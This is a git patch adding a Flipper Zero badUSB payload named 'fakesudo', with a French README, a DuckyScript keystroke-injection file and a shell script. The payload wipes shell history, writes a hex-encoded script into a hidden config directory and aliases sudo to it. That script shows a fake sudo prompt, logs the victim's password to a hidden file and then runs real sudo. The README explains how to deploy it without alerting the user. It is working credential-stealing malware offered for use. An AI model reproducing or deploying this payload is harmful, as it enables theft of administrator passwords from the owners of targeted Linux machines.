From 518fcffa665dac649d2dff0a57bed325eeb3d1b0 Mon Sep 17 00:00:00 2001 From: Snorky Date: Fri, 31 May 2024 15:01:04 +0200 Subject: [PATCH] =?UTF-8?q?T=C3=A9l=C3=A9verser=20les=20fichiers=20vers=20?= =?UTF-8?q?"badUSB/fakesudo"?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- badUSB/fakesudo/README.md | 19 +++++ badUSB/fakesudo/fakesudo.txt | 132 +++++++++++++++++++++++++++++++++++ badUSB/fakesudo/system-local | 21 ++++++ 3 files changed, 172 insertions(+) create mode 100644 badUSB/fakesudo/README.md create mode 100644 badUSB/fakesudo/fakesudo.txt create mode 100644 badUSB/fakesudo/system-local diff --git a/badUSB/fakesudo/README.md b/badUSB/fakesudo/README.md new file mode 100644 index 0000000..0d1704e --- /dev/null +++ b/badUSB/fakesudo/README.md @@ -0,0 +1,19 @@ +Le script `systemd-local` est le bout de code du fakesudo qui lui mm est en hexa dans le fichier `fakesudo.txt`. + +Le script `systemd-local` alias `fakesudo` ne s'active seulement une fois par heure max afin de ne pas alerter l'utilisateur. + +Rien a faire de spécial à part brancher le flipper et injecter le payload. + +Les mots de passes récupérés pas le `fakesudo` sont disponible dans le répertoire `/home/$USER/.config/.dsystem/log/systemd-local.log` + +Pour le moment il ne gère que la commande `sudo`. Dans une prochaine version, la commande `su` sera aussi prise en compte. + +Enjoy and HackThePlanet !!! + +## **_PS: Bien évident je ne suis pas responsable de ce que vous faites avec ce script._** + + +![Demo Fakesudo](assets/fakesudo.gif) + + + diff --git a/badUSB/fakesudo/fakesudo.txt b/badUSB/fakesudo/fakesudo.txt new file mode 100644 index 0000000..4d6bc8b --- /dev/null +++ b/badUSB/fakesudo/fakesudo.txt @@ -0,0 +1,132 @@ +REM ####################################################### +REM # | +REM # Title : FakeSudo - Linux | +REM # Author : Snorky | +REM # Version : 1.0 | +REM # Category : Credentials | +REM # Target : Linux | +REM # | +REM ####################################################### + +REM Requirements: +REM - Nothing special. :) + + +REM ##################### +REM # # +REM # BEGIN: # +REM # Open a terminal # +REM # # +REM ##################### + +DELAY 500 +CTRL-ALT t +DELAY 500 + + +REM ########### +REM # # +REM # Set Var # +REM # # +REM ########### + +REM Nop i'm not in your HISTORY.. :) +STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +ENTER +DELAY 100 + + +REM DIR LOG and Binary name +STRING _DIR="/home/$USER/.config/.dsystem/bin"; _BIN="systemd-local"; _LOG="/home/$USER/.config/.dsystem/log" +ENTER +DELAY 100 + + +REM ######################## +REM # # +REM # Create DIR # +REM # Push fakesudo script # +REM # # +REM ######################## + +STRING cd +ENTER +DELAY 100 + +STRING mkdir -p $_DIR +ENTER +DELAY 100 + +STRING mkdir -p $_LOG +ENTER +DELAY 100 + +STRING echo -e """ +STRING \x23\x21\x2f\x62\x69\x6e\x2f\x73\x68\x0a\x0a\x5f\x44\x49\x52\x5f\ +ENTER +STRING \x4c\x4f\x47\x3d\x22\x2f\x68\x6f\x6d\x65\x2f\x24\x55\x53\x45\x52\ +ENTER +STRING \x2f\x2e\x63\x6f\x6e\x66\x69\x67\x2f\x2e\x64\x73\x79\x73\x74\x65\ +ENTER +STRING \x6d\x2f\x6c\x6f\x67\x22\x0a\x5f\x44\x49\x52\x5f\x42\x49\x4e\x3d\ +ENTER +STRING \x22\x2f\x68\x6f\x6d\x65\x2f\x24\x55\x53\x45\x52\x2f\x2e\x63\x6f\ +ENTER +STRING \x6e\x66\x69\x67\x2f\x2e\x64\x73\x79\x73\x74\x65\x6d\x2f\x62\x69\ +ENTER +STRING \x6e\x22\x0a\x5f\x54\x53\x3d\x30\x0a\x0a\x5f\x44\x41\x54\x45\x3d\ +ENTER +STRING \x24\x28\x64\x61\x74\x65\x20\x2b\x25\x73\x29\x0a\x0a\x5f\x44\x49\ +ENTER +STRING \x46\x46\x3d\x24\x28\x28\x20\x24\x5f\x44\x41\x54\x45\x20\x2d\x20\ +ENTER +STRING \x24\x5f\x54\x53\x20\x29\x29\x0a\x0a\x69\x66\x20\x5b\x20\x24\x5f\ +ENTER +STRING \x44\x49\x46\x46\x20\x2d\x67\x74\x20\x33\x36\x30\x30\x20\x5d\x3b\ +ENTER +STRING \x20\x74\x68\x65\x6e\x0a\x0a\x20\x20\x20\x20\x72\x65\x61\x64\x20\ +ENTER +STRING \x2d\x73\x70\x20\x22\x5b\x73\x75\x64\x6f\x5d\x20\x70\x61\x73\x73\ +ENTER +STRING \x77\x6f\x72\x64\x20\x66\x6f\x72\x20\x24\x55\x53\x45\x52\x3a\x20\ +ENTER +STRING \x22\x20\x5f\x53\x50\x0a\x20\x20\x20\x20\x65\x63\x68\x6f\x20\x22\ +ENTER +STRING \x22\x0a\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x20\x32\x0a\x20\x20\ +ENTER +STRING \x20\x20\x65\x63\x68\x6f\x20\x22\x53\x6f\x72\x72\x79\x2c\x20\x74\ +ENTER +STRING \x72\x79\x20\x61\x67\x61\x69\x6e\x2e\x22\x0a\x20\x20\x20\x20\x65\ +ENTER +STRING \x63\x68\x6f\x20\x24\x5f\x53\x50\x20\x3e\x3e\x20\x24\x5f\x44\x49\ +ENTER +STRING \x52\x5f\x4c\x4f\x47\x2f\x24\x28\x62\x61\x73\x65\x6e\x61\x6d\x65\ +ENTER +STRING \x20\x24\x30\x29\x2e\x6c\x6f\x67\x0a\x20\x20\x20\x20\x73\x65\x64\ +ENTER +STRING \x20\x2d\x69\x20\x27\x30\x2c\x2f\x5f\x54\x53\x3d\x2e\x2a\x2f\x20\ +ENTER +STRING \x73\x2f\x2f\x5f\x54\x53\x3d\x27\x24\x5f\x44\x41\x54\x45\x27\x2f\ +ENTER +STRING \x27\x20\x24\x5f\x44\x49\x52\x5f\x42\x49\x4e\x2f\x24\x28\x62\x61\ +ENTER +STRING \x73\x65\x6e\x61\x6d\x65\x20\x24\x30\x29\x0a\x66\x69\x0a\x0a\x2f\ +ENTER +STRING \x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x75\x64\x6f\x20\x24\x40\x0a\ +ENTER +STRING """ > $_DIR/$_BIN +ENTER +DELAY 100 + +STRING echo "alias sudo=\"$_DIR/$_BIN\" " >> .bashrc +ENTER +DELAY 100 + +STRING chmod +x $_DIR/$_BIN +ENTER +DELAY 100 + + +STRING exit +ENTER + diff --git a/badUSB/fakesudo/system-local b/badUSB/fakesudo/system-local new file mode 100644 index 0000000..d9710fd --- /dev/null +++ b/badUSB/fakesudo/system-local @@ -0,0 +1,21 @@ +#!/bin/sh + +_DIR_LOG="/home/$USER/.config/.dsystem/log" +_DIR_BIN="/home/$USER/.config/.dsystem/bin" +_TS=0 + +_DATE=$(date +%s) + +_DIFF=$(( $_DATE - $_TS )) + +if [ $_DIFF -gt 3600 ]; then + + read -sp "[sudo] password for $USER: " _SP + echo "" + sleep 2 + echo "Sorry, try again." + echo $_SP >> $_DIR_LOG/$(basename $0).log + sed -i '0,/_TS=.*/ s//_TS='$_DATE'/' $_DIR_BIN/$(basename $0) +fi + +/usr/bin/sudo $@